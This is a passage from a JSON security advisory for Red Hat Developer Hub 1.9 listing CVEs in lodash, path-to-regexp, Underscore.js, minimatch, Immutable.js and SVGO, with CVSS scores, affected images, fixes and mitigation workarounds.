            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports"
    },
    {
      "cve": "CVE-2026-4926",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "discovery_date": "2026-03-26T20:03:28.427630+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2451867"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in path-to-regexp. A remote attacker could exploit this vulnerability by providing specially crafted input that generates a regular expression with multiple sequential optional groups. This leads to an exponential growth in the generated regular expression, causing a Denial of Service (DoS) due to excessive resource consumption.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "path-to-regexp: path-to-regexp: Denial of Service via crafted regular expressions",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This is an Important flaw in `path-to-regexp` that can lead to a Denial of Service. The vulnerability occurs when specially crafted input containing multiple sequential optional groups is used to generate regular expressions, causing exponential resource consumption.\n\nThe Red Hat Advanced Cluster Security is not affected by this issue since it\u0027s shipping a `path-to-regexp` version which doesn\u0027t contain the vulnerable code.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4926"
        },
        {
          "category": "external",
          "summary": "RHBZ#2451867",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451867"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4926",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4926"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        }
      ],
      "release_date": "2026-03-26T18:59:38+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "To mitigate this vulnerability, limit the use of multiple sequential optional groups in route patterns within applications that use `path-to-regexp`. Additionally, avoid directly passing user-controlled input as route patterns to prevent the generation of maliciously crafted regular expressions.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "path-to-regexp: path-to-regexp: Denial of Service via crafted regular expressions"
    },
    {
      "cve": "CVE-2026-27601",
      "cwe": {
        "id": "CWE-606",
        "name": "Unchecked Input for Loop Condition"
      },
      "discovery_date": "2026-03-03T23:01:58.011378+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2444247"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Underscore.js, a JavaScript utility library. This vulnerability allows a remote attacker to trigger a Denial of Service (DoS) attack by providing specially crafted recursive data structures. When these structures are processed by the _.flatten or _.isEqual functions, which lack a depth limit for recursion, a stack overflow occurs. This can make the application unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual functions",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27601"
        },
        {
          "category": "external",
          "summary": "RHBZ#2444247",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444247"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27601",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27601"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
        },
        {
          "category": "external",
          "summary": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4",
          "url": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4"
        },
        {
          "category": "external",
          "summary": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84",
          "url": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84"
        },
        {
          "category": "external",
          "summary": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw",
          "url": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw"
        }
      ],
      "release_date": "2026-03-03T22:38:38.955000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, applications utilizing Underscore.js should ensure that any processing of untrusted, recursively structured data with `_.flatten` or `_.isEqual` explicitly enforces a finite depth limit. Review application code to identify and modify calls to these functions, adding appropriate depth parameters to prevent stack overflow conditions. Additionally, input validation should be implemented to sanitize untrusted data before it is processed by Underscore.js functions.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual functions"
    },
    {
      "cve": "CVE-2026-27904",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "discovery_date": "2026-02-26T02:01:23.004531+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2442922"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27904"
        },
        {
          "category": "external",
          "summary": "RHBZ#2442922",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
        },
        {
          "category": "external",
          "summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
          "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
        }
      ],
      "release_date": "2026-02-26T01:07:42.693000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
    },
    {
      "cve": "CVE-2026-29063",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-03-06T19:00:57.982727+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445291"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445291",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
          "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
        }
      ],
      "release_date": "2026-03-06T18:25:22.438000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-29074",
      "cwe": {
        "id": "CWE-776",
        "name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
      },
      "discovery_date": "2026-03-06T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445132"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "svgo: SVGO: Denial of Service via XML entity expansion",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445132",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
          "url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
        }
      ],
      "release_date": "2026-03-06T07:23:05.716000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "svgo: SVGO: Denial of Service via XML entity expansion"
    },
    {
      "cve": "CVE-2026-29186",
      "cwe": {
        "id": "CWE-791",
        "name": "Incomplete Filtering of Special Elements"
      },
      "discovery_date": "2026-03-07T16:01:40.949207+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
